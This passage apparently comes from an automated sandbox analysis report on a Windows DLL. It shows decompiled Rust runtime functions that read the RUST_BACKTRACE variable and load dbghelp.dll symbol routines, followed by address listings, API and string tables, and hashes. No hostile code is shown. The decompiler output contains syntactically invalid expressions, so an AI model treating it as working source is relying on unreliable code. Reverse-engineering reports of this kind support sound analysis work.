								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6ED39A30( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6ed5face;
							if(_t264 != 0x6ed5face) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6ed5face;
									if(_t229 == 0x6ed5face) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6ed5face;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6ed5face;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6ed5face;
											if(_t264 == 0x6ed5face) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6ed5face;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6ed5face;
												if(_t273 == 0x6ed5face) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6ed5face;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6ED39A30( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6ED2E9D0(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6ed5f8cc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6ED39A30( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6ED20D10(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6ed6e128, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6ed6e128, 0, _t167);
													}
													HeapFree( *0x6ed6e128, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6ed6e128, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6ed606d8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6ed6e128, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6ed6e128, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6ed6e128, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6ED392F0(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6ED39470(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6ed606e0);
						asm("ud2");
						__eflags =  &_a8;
						E6ED148D0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6ED1D270(_t263);
					} else {
						 *0x6ed6e128 = _t142;
						goto L3;
					}
				}
				L96:
			}

0x6ed1d380
0x6ed1d380
0x6ed1d380
0x6ed1d383
0x6ed1d384
0x6ed1d385
0x6ed1d386
0x6ed1d38c
0x6ed1d38f
0x6ed1d396
0x6ed1d39d
0x6ed1d3aa
0x6ed1d3ad
0x6ed1d3b3
0x6ed1d3ba
0x6ed1d3ce
0x6ed1d3d3
0x6ed1d3da
0x00000000
0x6ed1d3e0
0x6ed1d3e0
0x6ed1d3e6
0x6ed1d3eb
0x6ed1d3ed
0x6ed1d3f2
0x6ed1d3f8
0x6ed1d402
0x6ed1d40c
0x6ed1d43d
0x6ed1d440
0x6ed1d443
0x00000000
0x00000000
0x6ed1d445
0x6ed1d44c
0x6ed1d454
0x6ed1d42f
0x6ed1d42f
0x6ed1d432
0x6ed1d436
0x6ed1d437
0x00000000
0x6ed1d456
0x6ed1d48a
0x6ed1d494
0x6ed1d497
0x6ed1d49e
0x6ed1d4a9
0x6ed1d4b2
0x6ed1d4ba
0x6ed1d4bd
0x6ed1d4c1
0x6ed1d4c6
0x6ed1d420
0x6ed1d426
0x6ed1d429
0x6ed1d42c
0x00000000
0x6ed1d42c
0x6ed1d460
0x6ed1d466
0x6ed1d468
0x6ed1d46e
0x6ed1d471
0x6ed1d474
0x6ed1d477
0x6ed1d479
0x6ed1d4d1
0x6ed1d4da
0x6ed1d4dc
0x6ed1d503
0x6ed1d50b
0x6ed1d50e
0x6ed1d513
0x6ed1d516
0x00000000
0x6ed1d518
0x6ed1d518
0x6ed1d51c
0x6ed1d522
0x6ed1d524
0x6ed1d52a
0x00000000
0x6ed1d530
0x00000000
0x6ed1d530
0x6ed1d52a
0x6ed1d4de
0x6ed1d4de
0x6ed1d4e2
0x6ed1d4e5
0x6ed1d4e8
0x6ed1d4eb
0x6ed1d53b
0x6ed1d53d
0x6ed1d543
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1d4ed
0x6ed1d4f3
0x6ed1d4f5
0x6ed1d565
0x6ed1d565
0x6ed1d567
0x6ed1d4f7
0x6ed1d4fb
0x6ed1d4fe
0x6ed1d4fe
0x6ed1d56a
0x6ed1d56d
0x6ed1d56f
0x6ed1d572
0x6ed1d595
0x6ed1d597
0x6ed1d59a
0x6ed1d5a0
0x00000000
0x6ed1d5a2
0x00000000
0x6ed1d5a2
0x6ed1d574
0x6ed1d574
0x6ed1d57d
0x6ed1d57f
0x6ed1d5aa
0x6ed1d5aa
0x6ed1d5ac
0x6ed1d581
0x6ed1d587
0x6ed1d58a
0x6ed1d58a
0x6ed1d5bf
0x6ed1d5c1
0x6ed1d5c4
0x6ed1d5ca
0x6ed1d549
0x6ed1d549
0x6ed1d54c
0x6ed1d54e
0x6ed1d554
0x00000000
0x6ed1d55a
0x00000000
0x6ed1d55a
0x6ed1d5d0
0x6ed1d5d0
0x6ed1d5d0
0x6ed1d5d6
0x6ed1d5f0
0x6ed1d5f3
0x6ed1d5f6
0x6ed1d5f8
0x6ed1d5fb
0x6ed1d601
0x00000000
0x6ed1d607
0x00000000
0x6ed1d607
0x6ed1d601
0x6ed1d5ca
0x6ed1d572
0x6ed1d4eb
0x6ed1d47b
0x6ed1d47b
0x6ed1d47d
0x6ed1d480
0x6ed1d482
0x6ed1d488
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1d488
0x00000000
0x6ed1d479
0x6ed1d60c
0x6ed1d612
0x6ed1d61a
0x6ed1d61d
0x6ed1d622
0x6ed1d625
0x6ed1d627
0x6ed1d62a
0x6ed1d62c
0x6ed1d674
0x6ed1d674
0x6ed1d676
0x6ed1d680
0x6ed1d680
0x6ed1d682
0x00000000
0x00000000
0x6ed1d688
0x6ed1d68b
0x6ed1d68f
0x6ed1d692
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1d692
0x6ed1d720
0x6ed1d723
0x6ed1d725
0x6ed1d731
0x6ed1d736
0x6ed1d739
0x6ed1d73c
0x6ed1d73c
0x6ed1d73f
0x6ed1d745
0x6ed1d74a
0x6ed1d74f
0x6ed1d752
0x6ed1d754
0x6ed1d757
0x00000000
0x6ed1d75d
0x6ed1d760
0x6ed1d771
0x6ed1d776
0x6ed1d779
0x6ed1d77e
0x6ed1d783
0x6ed1d785
0x6ed1d788
0x6ed1d78f
0x6ed1d792
0x6ed1d799
0x6ed1d79f
0x6ed1d7c2
0x6ed1d7c7
0x6ed1d7cb
0x6ed1d7cd
0x6ed1d7cf
0x6ed1d7d2
0x6ed1d7df
0x6ed1d7e4
0x6ed1d7ea
0x6ed1d7ed
0x6ed1d7ed
0x6ed1d7f0
0x6ed1d7f3
0x6ed1d7f5
0x6ed1d7f8
0x6ed1d7a1
0x6ed1d800
0x6ed1d800
0x6ed1d806
0x6ed1d806
0x6ed1d80d
0x6ed1d80d
0x6ed1d812
0x6ed1d81d
0x6ed1d823
0x6ed1d825
0x6ed1d827
0x6ed1d833
0x6ed1d833
0x6ed1d835
0x6ed1d7b0
0x6ed1d7b0
0x6ed1d7b2
0x6ed1d7b4
0x6ed1d876
0x6ed1d879
0x6ed1d880
0x6ed1d882
0x00000000
0x6ed1d888
0x6ed1d88e
0x6ed1d88f
0x6ed1d894
0x6ed1d897
0x6ed1d89a
0x6ed1d89d
0x6ed1d8a0
0x6ed1d8a2
0x6ed1d8a5
0x6ed1d8a7
0x00000000
0x00000000
0x6ed1d8a9
0x00000000
0x6ed1d8a7
0x6ed1d7ba
0x6ed1d7ba
0x6ed1d7c0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1d7c0
0x6ed1d83b
0x6ed1d83b
0x6ed1d841
0x6ed1d844
0x00000000
0x6ed1d84a
0x6ed1d84a
0x6ed1d84c
0x6ed1d852
0x00000000
0x6ed1d854
0x00000000
0x6ed1d854
0x00000000
0x6ed1d852
0x6ed1d844
0x6ed1d829
0x6ed1d829
0x6ed1d82f
0x6ed1d831
0x6ed1d8ab
0x6ed1d8ad
0x6ed1d8b3
0x6ed1d8b5
0x6ed1d8b7
0x6ed1d8ba
0x6ed1d8bc
0x6ed1d8be
0x6ed1d8be
0x6ed1d8c2
0x6ed1d8c4
0x6ed1d8c9
0x6ed1d8d6
0x6ed1d8d9
0x6ed1d8de
0x6ed1d8de
0x6ed1d8c9
0x6ed1d8c2
0x6ed1d8e1
0x6ed1d8e1
0x6ed1d8e3
0x6ed1d93d
0x6ed1d940
0x6ed1d942
0x6ed1d945
0x6ed1d8e5
0x6ed1d8e8
0x6ed1d8eb
0x6ed1d8f1
0x6ed1d8f8
0x6ed1d900
0x6ed1d903
0x6ed1d905
0x6ed1d908
0x6ed1d90b
0x6ed1d90e
0x6ed1d912
0x6ed1d914
0x6ed1d916
0x6ed1d91a
0x6ed1d91c
0x6ed1d91c
0x6ed1d928
0x6ed1d928
0x6ed1d936
0x6ed1d936
0x6ed1d8f1
0x6ed1d948
0x6ed1d94f
0x6ed1d960
0x6ed1d960
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1d831
0x6ed1d827
0x6ed1d62e
0x6ed1d62e
0x6ed1d630
0x6ed1d632
0x6ed1d632
0x6ed1d636
0x00000000
0x00000000
0x6ed1d638
0x6ed1d63d
0x00000000
0x6ed1d63f
0x6ed1d63f
0x6ed1d644
0x00000000
0x6ed1d646
0x6ed1d646
0x6ed1d64b
0x00000000
0x6ed1d64d
0x6ed1d64d
0x6ed1d652
0x00000000
0x6ed1d654
0x6ed1d654
0x6ed1d659
0x00000000
0x6ed1d65b
0x6ed1d65b
0x6ed1d660
0x00000000
0x6ed1d662
0x6ed1d662
0x6ed1d667
0x00000000
0x6ed1d669
0x6ed1d669
0x6ed1d66c
0x6ed1d66f
0x6ed1d672
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1d672
0x6ed1d667
0x6ed1d660
0x6ed1d659
0x6ed1d652
0x6ed1d64b
0x6ed1d644
0x00000000
0x6ed1d63d
0x6ed1d694
0x6ed1d694
0x6ed1d697
0x6ed1d69e
0x6ed1d6a5
0x6ed1d6a7
0x6ed1d6a9
0x6ed1d6ab
0x6ed1d6ad
0x6ed1d6b3
0x6ed1d6be
0x6ed1d6be
0x6ed1d6b3
0x6ed1d6ab
0x6ed1d6c3
0x6ed1d6c7
0x6ed1d6cd
0x6ed1d6d2
0x6ed1d6d5
0x6ed1d6d8
0x6ed1d6e0
0x6ed1d6e2
0x6ed1d6e5
0x6ed1d6e8
0x6ed1d6eb
0x6ed1d6ef
0x6ed1d6f1
0x6ed1d6f3
0x6ed1d6f7
0x6ed1d6f9
0x6ed1d6f9
0x6ed1d705
0x6ed1d70a
0x6ed1d70a
0x6ed1d716
0x6ed1d716
0x6ed1d859
0x6ed1d85c
0x6ed1d862
0x6ed1d862
0x6ed1d865
0x6ed1d875
0x6ed1d875
0x00000000
0x6ed1d62c
0x6ed1d43d
0x6ed1d3bc
0x6ed1d3bc
0x6ed1d3c3
0x6ed1d96a
0x6ed1d96f
0x6ed1d974
0x6ed1d979
0x6ed1d97b
0x6ed1d982
0x6ed1d98a
0x6ed1d994
0x6ed1d99f
0x6ed1d9af
0x6ed1d3c9
0x6ed1d3c9
0x00000000
0x6ed1d3c9
0x6ed1d3c3
0x00000000

APIs

GetProcessHeap.KERNEL32 ref: 6ED1D3BC
HeapAlloc.KERNEL32(01390000,00000000,0000000A), ref: 6ED1D3D3

Strings

RUST_BACKTRACE, xrefs: 6ED1D48A, 6ED1D4C0

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID: RUST_BACKTRACE
API String ID: 1617791916-3454309823
Opcode ID: 20d738a67192d6742d0f0d62439ff57260696a6f4d470c85b0c0b81499986eb8
Instruction ID: 8163e6bba5c4f3c77798d3c319e7bc7f44c6c1b762b32b15894c4154c7254cae
Opcode Fuzzy Hash: 20d738a67192d6742d0f0d62439ff57260696a6f4d470c85b0c0b81499986eb8
Instruction Fuzzy Hash: 7B02BAB1E08218CFEB14CFD8E8907DDB7B1AF49315F244129E559BB280D774A981CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1E4E0, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135
libraryloadersynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E6ED1E4E0(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6ED239F0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6ed6e124; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6ed6e124], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6ed6e130; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6ed6e164 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6ed6e134; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6ed6e138; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6ed6e13c; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6ed6e164 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6ed6e130, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6ED394E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6ed604bc);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6ed6e13c = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6ed6e130, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6ED394E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6ed604ac);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6ed6e138 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6ED394E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6ed6049c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6ED1E6D0(_v36);
								} else {
									_t38 = _t30;
									 *0x6ed6e134 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6ed6e130 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}

0x6ed1e4e0
0x6ed1e4e4
0x6ed1e4e9
0x6ed1e4ec
0x6ed1e4f3
0x6ed1e504
0x6ed1e507
0x6ed1e50d
0x6ed1e515
0x6ed1e5f5
0x6ed1e5fa
0x6ed1e5fc
0x6ed1e620
0x00000000
0x6ed1e5fe
0x6ed1e5fe
0x6ed1e600
0x6ed1e602
0x6ed1e60a
0x6ed1e613
0x6ed1e619
0x6ed1e619
0x00000000
0x6ed1e60a
0x6ed1e51b
0x6ed1e51b
0x6ed1e520
0x6ed1e525
0x6ed1e52c
0x6ed1e545
0x6ed1e545
0x6ed1e54e
0x00000000
0x6ed1e554
0x6ed1e554
0x6ed1e55c
0x6ed1e579
0x6ed1e579
0x6ed1e57b
0x6ed1e581
0x6ed1e585
0x6ed1e5a7
0x6ed1e5ab
0x6ed1e5ad
0x6ed1e5b5
0x6ed1e5d7
0x6ed1e5d7
0x6ed1e5e1
0x6ed1e5e3
0x00000000
0x6ed1e5b7
0x6ed1e5c2
0x6ed1e5ca
0x6ed1e68d
0x6ed1e690
0x6ed1e6a6
0x00000000
0x6ed1e5d0
0x6ed1e5d0
0x6ed1e5d2
0x00000000
0x6ed1e5d2
0x6ed1e5ca
0x6ed1e587
0x6ed1e592
0x6ed1e59a
0x6ed1e66a
0x6ed1e66d
0x6ed1e683
0x00000000
0x6ed1e5a0
0x6ed1e5a0
0x6ed1e5a2
0x00000000
0x6ed1e5a2
0x6ed1e59a
0x6ed1e55e
0x6ed1e564
0x6ed1e56c
0x6ed1e647
0x6ed1e64a
0x6ed1e660
0x6ed1e6ae
0x6ed1e6ae
0x6ed1e6b4
0x6ed1e6c3
0x6ed1e572
0x6ed1e572
0x6ed1e574
0x00000000
0x6ed1e574
0x6ed1e56c
0x6ed1e55c
0x6ed1e52e
0x6ed1e533
0x6ed1e53a
0x6ed1e53f
0x6ed1e628
0x6ed1e62d
0x6ed1e632
0x6ed1e637
0x6ed1e646
0x00000000
0x00000000
0x00000000
0x6ed1e53f
0x6ed1e52c

APIs

WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ED1E520
LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ED1E533
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6ED1E564
GetProcAddress.KERNEL32(SymSetOptions), ref: 6ED1E592
GetProcAddress.KERNEL32(SymInitializeW), ref: 6ED1E5C2
GetCurrentProcess.KERNEL32 ref: 6ED1E5D7
CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6ED1E5F5
CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ED1E613

Part of subcall function 6ED1E6D0: ReleaseMutex.KERNEL32(?,6ED1E448), ref: 6ED1E6D1

Strings

Local\RustBacktraceMutex, xrefs: 6ED1E5EC
SymGetOptions, xrefs: 6ED1E55E
SymSetOptions, xrefs: 6ED1E587
SymInitializeW, xrefs: 6ED1E5B7
dbghelp.dll, xrefs: 6ED1E52E
called `Option::unwrap()` on a `None` value, xrefs: 6ED1E651, 6ED1E674, 6ED1E697

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
API String ID: 1067696788-3213342004
Opcode ID: 35c880cd57a1a3d9ff47c884aa3a6babb1882dcd82f9f58d69f18f9b105471c8
Instruction ID: 226949ca9a0a45ada4c71a90314f7694f6ae8f71b6d218d1a2a2f8d43c455fea
Opcode Fuzzy Hash: 35c880cd57a1a3d9ff47c884aa3a6babb1882dcd82f9f58d69f18f9b105471c8
Instruction Fuzzy Hash: EC41C271E046019FFF609BE59C547AA37B8AB46754F000938EC05AB7C1EB38D902C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1E6E0, Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 588
libraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 52%

